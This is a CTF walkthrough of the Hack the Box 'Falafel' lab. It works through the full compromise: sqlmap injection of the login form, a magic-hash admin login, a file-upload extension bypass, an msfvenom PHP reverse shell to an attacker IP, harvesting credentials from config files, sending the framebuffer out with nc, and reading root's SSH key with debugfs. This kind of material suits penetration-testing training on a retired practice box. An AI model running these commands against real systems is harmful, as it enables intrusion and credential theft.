CTF Challenges

Hack the Box Challenge: Falafel Walkthrough

In this Post, we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Penetration Methodology 

Scanning

  • Open ports and Running services (Nmap)

Enumeration 

  • Enumerating Web Directory (Dirbuster)
  • Identify Web application vulnerability 
  • SQL Injection

Exploiting Web Application Vulnerabilities 

  • Login form SQL Injection
  • File Upload 

Spawning Shell

  • Injecting PHP payload (Metasploit)
  • Stealing SSH Credential
  • SSH login
  • Get user.txt

Privilege Escalation 

  • Cracking Frame-buffer Device (Cyber Forensic)
  • Escalated root shell
  • Get root.txt

Walk-Through 

Scanning

Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.

nmap –A 10.10.10.73

From its scanning result, we found port 22 and 80 are open for ssh and http services.

So we explored target IP through the web browser and it put up a login page shown.

Enumeration 

When I didn’t found any remarkable things then I used Dirbuster for directory brute force attack. It put up so many files but /cyberlaw.txt looks more interesting so I browsed http://10.10.10.73/cyber.txt and put a message in front of me.

By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.

Then we try SQL injection on the login form but it gave an error “Wrong Identification: admin

Exploiting Web Application Vulnerabilities 

Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.

sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" --dbs --batch

As result, it dumps the database name “falafel” now let’s extract the whole database information.

sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch

So we got users tables from inside it and it has username and password as shown.

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….

With help of the following credential we login into admin dashboard and move to upload options.

Username: admin
Password: 240610708

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site. We have to use the msfvenom command for generating PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw

Now copy the code from *<?php….die(); and paste in a text file then as rajjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.php.png (240 character) also start multi handler in a new terminal.

Let me make it clear to you, here the author has applied filter for identifying  240 character file which means your file name must contain 240 characters including extension.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

Let execute it in the URL for obtaining reverse shell at Metasploit.

Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.

msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.25
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation. Further, we open passwd file and notice two system username i.e. yossi and moshe.

meterpreter> cat /etc/passwd

After making some more inspection we found a file connection.php from inside /var/www/html and receive database credential from inside it.

meterpreter> cd /var/www/html
meterpreter> ls
meterpreter> cat /connection.php

This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe

ssh moshe@10.10.10.73
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home                                                             
cd moshe
cat user.txt

Privilege Escalation 

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw

groups
cat /dev/fb0 > /tmp/screen.raw
cd /tmp
ls
nc 10.10.14.25 5555 < screen.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..

cat /sys/class/graphics/fb0/virtual_size

Now enter the following command to convert raw data into a .png image format

./iraw2png.pl 1176 885 < screen.raw > screen.png

Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe! for user Yossi.

With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.

df
debugfs /dev/sda1
cat /root/.ssh/id_rsa

Now copy the RSA key in a text file and named as key in your local machine. Also, give permission 600 to it. Then connect to ssh once again through above RSA file as given below:

ssh -i key root@10.10.10.73
ls
cat root.txt

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here